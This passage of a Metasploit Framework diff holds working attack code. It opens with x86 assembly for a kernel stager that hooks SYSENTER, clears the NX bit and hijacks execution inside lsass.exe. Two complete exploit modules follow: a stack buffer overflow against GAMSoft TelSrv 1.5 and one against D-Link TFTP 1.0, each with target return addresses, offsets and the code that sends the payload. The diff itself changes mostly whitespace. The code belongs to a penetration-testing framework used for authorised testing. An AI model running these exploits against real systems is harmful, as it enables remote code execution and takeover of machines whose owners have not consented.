sysenter +ring0_stager_start: + push byte 0 ; alloc a dword for the patched return address + pushfd ; save flags and registers + pushad + call ring0_stager_eip +ring0_stager_eip: + pop eax + ; patch in the real nt!KiFastCallEntry address as our return address + mov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 0 ] + mov [ esp + 36 ], ebx + ; see if we are being told to remove our sysenter hook... 
+ cmp ecx, 0xDEADC0DE + jne ring0_stager_hook + push 0x176 ; SYSENTER_EIP_MSR + pop ecx + mov eax, ebx ; set the sysenter msr to be the real nt!KiFastCallEntry address + xor edx, edx + wrmsr + xor eax, eax ; clear eax (the syscall number) so we can continue + jmp short ring0_stager_finish +ring0_stager_hook: + ; get the origional r3 return address (edx is the ring3 stack pointer) + mov esi, [ edx ] + ; determine if the return is to a "ret" instruction + movzx ebx, byte [ esi ] + cmp bx, 0xC3 + ; only insert our ring3 stager hook if we are to return to a single ret (for stability). + jne short ring0_stager_finish + ; calculate our r3 address in shared memory + mov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 8 ] + lea ebx, [ ebx + ring3_start - ring0_stager_start ] + ; patch in our r3 stage as the r3 return address + mov [ edx ], ebx + ; detect if NX is present (clobbers eax,ebx,ecx,edx)... + mov eax, 0x80000001 + cpuid + and edx, 0x00100000 ; bit 20 is the NX bit + jz short ring0_stager_finish + ; modify the correct page table entry to make our ring3 stager executable + mov edx, 0x45454545 ; we default to 0xC03FFF00 this for now (should calculate dynamically). + add edx, 4 + and dword [ edx ], 0x7FFFFFFF ; clear the NX bit + ; finish up by returning into the real KiFastCallEntry and then returning into our ring3 code (if hook was set). 
+ring0_stager_finish: + popad ; restore registers + popfd ; restore flags + ret ; return to real nt!KiFastCallEntry +ring0_stager_data: + dd 0xFFFFFFFF ; saved nt!KiFastCallEntry + dd 0x42424242 ; kernel memory address of stager (default to 0xFFDF0400) + dd 0x43434343 ; shared user memory address of stager (default to 0x7FFE0400) +;=================================================================================== +ring3_start: + pushad + push byte 0x30 + pop eax + cdq ; zero edx + mov ebx, [ fs : eax ] ; get the PEB + cmp [ ebx + 0xC ], edx + jz ring3_finish + mov eax, [ ebx + 0x10 ] ; get pointer to the ProcessParameters (_RTL_USER_PROCESS_PARAMETERS) + mov eax, [ eax + 0x3C ] ; get the current processes ImagePathName (unicode string) + add eax, byte 0x28 ; advance past '*:\windows\system32\' (we assume this as we want a system process). + mov ecx, [ eax ] ; compute a simple hash of the name. get first 2 wide chars of name 'l\x00s\x00' + add ecx, [ eax + 0x3 ] ; and add '\x00a\x00s' + cmp ecx, 0x44444444 ; check the hash (default to hash('lsass.exe') == 0x7373616C) + jne ring3_finish ; if we are not currently in the correct process, return to real caller + call ring3_cleanup ; otherwise we first remove our ring0 sysenter hook + call ring3_stager ; and then call the real ring3 payload + jmp ring3_finish ; should the payload return we can resume this thread correclty. +ring3_cleanup: + mov ecx, 0xDEADC0DE ; set the magic value for ecx + mov edx, esp ; save our esp in edx for sysenter + sysenter ; now sysenter into ring0 to remove the sysenter hook (return to ring3_cleanup's caller). +ring3_finish: + popad + ret ; return to the origional system calls caller +;=================================================================================== +ring3_stager: + ; ...ring3 stager here... +;=================================================================================== +=end 
diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb
index 457452903c..f0f3f3e86b 100644
--- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb
+++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb
@@ -1,122 +1,122 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - - +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + + class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'GAMSoft TelSrv 1.5 Username Buffer Overflow', - 'Description' => %q{ - This module exploits a username sprintf stack overflow in GAMSoft TelSrv 1.5. - Other versions may also be affected. The service terminates after exploitation, - so you only get one chance! - }, - 'Author' => [ 'Patrick Webster ' ], - 'Arch' => [ ARCH_X86 ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2000-0665'], + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'GAMSoft TelSrv 1.5 Username Buffer Overflow', + 'Description' => %q{ + This module exploits a username sprintf stack overflow in GAMSoft TelSrv 1.5. + Other versions may also be affected. The service terminates after exploitation, + so you only get one chance! 
+ }, + 'Author' => [ 'Patrick Webster ' ], + 'Arch' => [ ARCH_X86 ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2000-0665'], [ 'OSVDB', '373'], - [ 'BID', '1478'], - [ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip'], - ], - 'Privileged' => false, - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Payload' => - { - 'Space' => 1000, - 'BadChars' => "\x00\x0a", - 'StackAdjustment' => -3500, - }, - 'Platform' => ['win'], - 'Targets' => - [ - [ - 'Windows 2000 Pro SP0/4 English REMOTE', - { - 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL - 'Offset' => 1886, - } - ], - [ - 'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)', - { - 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL - 'Offset' => 3318, - } - ], - [ - 'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)', - { - 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL - 'Offset' => 3358, - } - ], - #[ - #'Windows XP Pro SP0/1 English', - #{ - # 'Ret' => 0x71aa32ad, # pop/pop/ret xp pro en ALL - # 'Offset' => 2600, # this is made up and absolutely wrong ;-) - #} - #], - #[ - ], - 'DisclosureDate' => 'Jul 17 2000', - 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(23), - ], self.class) - end - - def check - connect - print_status("Attempting to determine if target is vulnerable...") - sleep(7) - banner = sock.get_once(-1,3) - - if (banner =~ /TelSrv 1\.5/) - return Exploit::CheckCode::Vulnerable - end - return Exploit::CheckCode::Safe - end - - def exploit - print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...") - connect - print_status("Connected to telnet service... waiting several seconds.") # User friendly message due to sleep. - sleep(7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not. 
- - username = rand_text_english(20000, payload_badchars) - seh = generate_seh_payload(target.ret) - username[target['Offset'], seh.length] = seh - - print_status("Sending #{ username.length} byte username as exploit (including #{seh.length} byte payload)...") - sock.put(username) - sleep(0.25) - print_status('Exploit sent...') - handler - disconnect - end - + [ 'BID', '1478'], + [ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip'], + ], + 'Privileged' => false, + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00\x0a", + 'StackAdjustment' => -3500, + }, + 'Platform' => ['win'], + 'Targets' => + [ + [ + 'Windows 2000 Pro SP0/4 English REMOTE', + { + 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL + 'Offset' => 1886, + } + ], + [ + 'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)', + { + 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL + 'Offset' => 3318, + } + ], + [ + 'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)', + { + 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL + 'Offset' => 3358, + } + ], + #[ + #'Windows XP Pro SP0/1 English', + #{ + # 'Ret' => 0x71aa32ad, # pop/pop/ret xp pro en ALL + # 'Offset' => 2600, # this is made up and absolutely wrong ;-) + #} + #], + #[ + ], + 'DisclosureDate' => 'Jul 17 2000', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(23), + ], self.class) + end + + def check + connect + print_status("Attempting to determine if target is vulnerable...") + sleep(7) + banner = sock.get_once(-1,3) + + if (banner =~ /TelSrv 1\.5/) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe + end + + def exploit + print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...") + connect + print_status("Connected to telnet service... waiting several seconds.") # User friendly message due to sleep. 
+ sleep(7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not. + + username = rand_text_english(20000, payload_badchars) + seh = generate_seh_payload(target.ret) + username[target['Offset'], seh.length] = seh + + print_status("Sending #{ username.length} byte username as exploit (including #{seh.length} byte payload)...") + sock.put(username) + sleep(0.25) + print_status('Exploit sent...') + handler + disconnect + end + end diff --git a/modules/exploits/windows/tftp/dlink_long_filename.rb b/modules/exploits/windows/tftp/dlink_long_filename.rb index 0a8e1d98cb..408e737989 100644 --- a/modules/exploits/windows/tftp/dlink_long_filename.rb +++ b/modules/exploits/windows/tftp/dlink_long_filename.rb 
@@ -1,87 +1,87 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking
-
- include Msf::Exploit::Remote::Udp
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'D-Link TFTP 1.0 Long Filename Buffer Overflow',
- 'Description' => %q{
- This module exploits a stack overflow in D-Link TFTP 1.0.
- By sending a request for an overly long file name, an attacker
- could overflow a buffer and execute arbitrary code. For best results,
- use bind payloads with nonx (No NX).
- },
- 'Author' => [
- 'LSO ', # Exploit module
- 'patrick', # Refs, stability, targets etc
- ],
- 'Version' => '$Revision$',
- 'References' =>
- [
- [ 'CVE', '2007-1435' ],
- [ 'OSVDB', '33977' ],
- [ 'BID', '22923' ],
- ],
- 'DefaultOptions' =>
- {
- 'EXITFUNC' => 'process',
- },
- 'Payload' =>
- {
- 'Space' => 1024,
- 'BadChars' => "\x00",
- 'Compat' =>
- {
- 'ConnectionType' => '-reverse',
- },
- },
- 'SaveRegisters' => [ 'ecx', 'eax', 'esi' ],
- 'Platform' => 'win',
-
- 'Targets' =>
- [
- # Patrick tested OK 20090228
- ['Windows 2000 SP4 English', { 'Ret' => 0x77e1ccf7 } ], # jmp ebx
- ['Windows 2000 SP3 English', { 'Ret' => 0x77f8361b } ], # jmp ebx
- ],
- 'Privileged' => false,
- 'DisclosureDate' => 'Mar 12 2007',
- 'DefaultTarget' => 0))
-
- register_options([Opt::RPORT(69)], self)
-
- end
-
- def exploit
- connect_udp
-
- print_status("Trying target #{target.name}...")
-
- juju = "\x00\x01"
- juju << Rex::Text.rand_text_alpha_upper(581)
- juju << Rex::Arch::X86.jmp_short(42)
- juju << Rex::Text.rand_text_alpha_upper(38)
- juju << [target.ret].pack('V') + payload.encoded
-
- udp_sock.put(juju)
-
- handler
- disconnect_udp
- end
-
-end
-
+
+ include Msf::Exploit::Remote::Udp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'D-Link TFTP 1.0 Long Filename Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack overflow in D-Link TFTP 1.0.
+ By sending a request for an overly long file name, an attacker
+ could overflow a buffer and execute arbitrary code. For best results,
+ use bind payloads with nonx (No NX).
+ },
+ 'Author' => [
+ 'LSO ', # Exploit module
+ 'patrick', # Refs, stability, targets etc
+ ],
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'CVE', '2007-1435' ],
+ [ 'OSVDB', '33977' ],
+ [ 'BID', '22923' ],
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 1024,
+ 'BadChars' => "\x00",
+ 'Compat' =>
+ {
+ 'ConnectionType' => '-reverse',
+ },
+ },
+ 'SaveRegisters' => [ 'ecx', 'eax', 'esi' ],
+ 'Platform' => 'win',
+
+ 'Targets' =>
+ [
+ # Patrick tested OK 20090228
+ ['Windows 2000 SP4 English', { 'Ret' => 0x77e1ccf7 } ], # jmp ebx
+ ['Windows 2000 SP3 English', { 'Ret' => 0x77f8361b } ], # jmp ebx
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Mar 12 2007',
+ 'DefaultTarget' => 0))
+
+ register_options([Opt::RPORT(69)], self)
+
+ end
+
+ def exploit
+ connect_udp
+
+ print_status("Trying target #{target.name}...")
+
+ juju = "\x00\x01"
+ juju << Rex::Text.rand_text_alpha_upper(581)
+ juju << Rex::Arch::X86.jmp_short(42)
+ juju << Rex::Text.rand_text_alpha_upper(38)
+ juju << [target.ret].pack('V') + payload.encoded
+
+ udp_sock.put(juju)
+
+ handler
+ disconnect_udp
+ end
+
+end
+